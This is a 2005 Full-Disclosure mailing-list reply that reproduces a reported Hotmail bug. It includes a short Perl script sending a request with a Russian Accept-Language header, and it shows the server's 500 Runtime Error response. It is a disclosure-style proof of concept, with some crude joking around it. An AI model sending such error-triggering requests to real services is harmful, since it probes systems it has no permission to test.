[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Hotmail.com doesn't like russians, returns 500 internal server error.

To: auto491351@xxxxxxxxxxxx
Subject: Re: [Full-disclosure] Hotmail.com doesn't like russians, returns 500 internal server error.
From: Georgi Guninski <guninski@xxxxxxxxxxxx>
Date: Sun, 1 May 2005 22:27:20 +0300

On Thu, Apr 28, 2005 at 08:31:50PM -0700, auto491351@xxxxxxxxxxxx wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> My friend blshkv showed me that he get hotmail.com to crash by just
> visiting the site! I used Paros Proxy to intercept the request and
> replayed it using telnet, with the same result.
> 
>

i can reproduce it:

fuck@bill:~$ cat ./fsckbll.pl 
#!/usr/bin/perl -w


use IO::Socket;
my $host=$ARGV[0] || "www.hotmail.com";
my $port=$ARGV[1] || 80;


my $sock=IO::Socket::INET->new(Proto => 'tcp',
        PeerAddr => $host,PeerPort =>$port) || die("socket");

print "Connected to ${host}:${port}\n";
my $first="GET / HTTP/1.0\r\nAccept-Language: en;q=1.0,ru;q=0.9\r\n\r\n";
print $sock $first;

while(<$sock>) {print $_;}


fuck@bill:~$ ./fsckbll.pl www.hotmail.com 80
Connected to www.hotmail.com:80
HTTP/1.1 500 Internal Server Error
Connection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3026

<html>
    <head>
        <title>Runtime Error</title>
        <style>
...snip...
            <b> Description: </b>An application error occurred on the server.
The current custom error settings for this application prevent the details of
the application error from being viewed remotely (for security reasons). It
could, h
owever, be viewed by browsers running on the local server machine.



 
> 
> I guess Hotmail.com's system administrators missed a few hardening
> steps, their developers forgot to have a default catch statement in
> their code and the QA people missed both of these issues in the
> UAT.

i guess hotmail missed the train.

-- 
where do you want bill gates to go today?


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Micky-dee's anyone?
Next by Date: Re: [Full-disclosure] Micky-dee's anyone?
Previous by thread: [Full-disclosure] Question: Security through Obscurity with VHOSTS
Next by thread: [Full-disclosure] Reminder to you Out-of-Office folks.
Index(es):
- Date
- Thread